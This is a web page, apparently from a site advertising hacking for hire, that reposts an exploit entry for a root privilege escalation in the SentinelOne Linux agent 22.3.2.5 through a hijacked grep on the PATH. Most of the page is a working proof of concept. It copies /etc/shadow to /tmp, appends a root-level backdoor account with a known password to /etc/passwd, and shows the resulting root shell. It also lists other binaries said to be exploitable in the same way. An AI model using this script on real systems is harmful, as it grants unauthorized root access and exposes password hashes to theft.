Data center: Ashburn, VA

Telegram Chat : MBHH_x86

Email Us: Help@mobilehackerforhire.com

Mobile Hacker For Hire

SentinelOne sentinelagent 22.3.2.5 Privilege Escalation ≈ Packet Storm

Table of Contents

Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Date: 12/06/2022
Exploit Author: ouch_this_hurts
Vendor Homepage: https://www.sentinelone.com/
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas
Version: 22.3.2.5
Tested on: Ubuntu 22.04.x
CVE: NA

Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes 🙂

Protips:
– If I Google you, and I cannot find an easy way to report the vulnerability, I’m not going to bother.
– If you require me to use HackerOne, I’m not going to bother.
– If you dont have a security.txt, how do you expect me to contact you?

Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:

Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!

PoC below:
1. Find the systems “earliest” `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.
2. Create the following `grep` file in that directory and make sure its executable:

“`shell
cat << SENTINELOOPS > /usr/local/bin/grep
#!/bin/bash
# I think I’ll have the passwds pl0x
cat /etc/shadow > /tmp/etc_shadow

# password is password 🙂
echo ‘sentinel_oops:$1$user1$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh’ >> /etc/passwd
SENTINELOOPS

chmod +x /usr/local/bin/grep
“`

3. Wait for machine to reboot, login as `sentinel_oops:password` 🙂

“`
$ su sentinel_oops
Password:
# whoami
root
“`

What actually happened here? On `sentinelagent` start it runs `sh -c “grep….”`.

So there are potentially other ways of privilege escalation via this “agent”?
– `grep` as demonstrated above
– `pgrep` examining the binary appears to be vulnerable
– `xargs` examining the binary appears to be vulnerable
– `cat` examining the binary appears to be vulnerable
– `pgrep` examining the binary appears to be vulnerable
– `ldd` examining the binary appears to be vulnerable
– `lsmod` examining the binary appears to be vulnerable
– `mksh` examining the binary appears to be vulnerable
– `awk` examining the binary appears to be vulnerable

[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)

Leave a Reply

Your email address will not be published. Required fields are marked *

error: Content is protected !!